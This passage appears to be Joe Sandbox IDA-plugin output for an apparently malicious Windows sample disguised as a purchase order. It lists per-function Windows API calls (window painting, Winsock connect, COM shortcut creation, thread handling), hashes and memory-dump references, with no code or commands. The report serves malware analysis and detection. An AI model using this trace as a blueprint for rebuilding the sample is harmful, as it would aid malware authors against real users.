                                                            • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                            • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                            Similarity
                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                            • String ID:
                                                            • API String ID: 659298297-0
                                                            • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                            • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                            • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                            • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                            APIs
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(00A01A78,000000F1,00000000,00000000), ref: 00440E6E
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(00A01A78,000000F1,00000001,00000000), ref: 00440E9A
                                                            Similarity
                                                            • API ID: Window$EnableMessageSend$LongShow
                                                            • String ID:
                                                            • API String ID: 142311417-0
                                                            • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                            • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                            • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                            • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                            • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                            • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                            • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00445879
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                            • _wcslen.LIBCMT ref: 004458FB
                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                            • String ID:
                                                            • API String ID: 3087257052-0
                                                            • Opcode ID: 044dc1d4464e5a3e34bbd85584dcc81f53abd7c79c998fa19c85a06668655aa2
                                                            • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                            • Opcode Fuzzy Hash: 044dc1d4464e5a3e34bbd85584dcc81f53abd7c79c998fa19c85a06668655aa2
                                                            • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                            APIs
                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                            Similarity
                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 245547762-0
                                                            • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                            • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                            • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                            • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 004471D8
                                                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                            • SelectObject.GDI32(?,00000000), ref: 00447228
                                                            • BeginPath.GDI32(?), ref: 0044723D
                                                            • SelectObject.GDI32(?,00000000), ref: 00447266
                                                            Similarity
                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                            • String ID:
                                                            • API String ID: 2338827641-0
                                                            • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                            • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                            • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                            • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00434598
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                            • Sleep.KERNEL32(00000000), ref: 004345D4
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                            • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                            • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                            • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                            • MessageBeep.USER32(00000000), ref: 00460C46
                                                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                            • EndDialog.USER32(?,00000001), ref: 00460C83
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                            • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                            • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                            • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                            • String ID:
                                                            • API String ID: 4023252218-0
                                                            • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                            • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                            • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                            • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                            APIs
                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                            • String ID:
                                                            • API String ID: 1489400265-0
                                                            • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                            • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                            • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                            • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                            APIs
                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                            • DestroyWindow.USER32(?), ref: 00455728
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                            • String ID:
                                                            • API String ID: 1042038666-0
                                                            • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                            • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                            • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                            • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                            • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                            • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                            • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041780F
                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                            • __getptd.LIBCMT ref: 00417826
                                                            • __amsg_exit.LIBCMT ref: 00417834
                                                            • __lock.LIBCMT ref: 00417844
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                            • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                            • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                            • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                            APIs
                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                            • String ID:
                                                            • API String ID: 2403457894-0
                                                            • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                            • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                            • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                            • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                            APIs
                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                            • __freefls@4.LIBCMT ref: 00415209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                            • String ID:
                                                            • API String ID: 4247068974-0
                                                            • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                            • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                            • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                            • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )$U$\
                                                            • API String ID: 0-3705770531
                                                            • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                            • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                            • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                            • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 0046E505
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                            • CoUninitialize.OLE32 ref: 0046E53D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                            • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                            • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                            • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                            • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                            • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                            • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
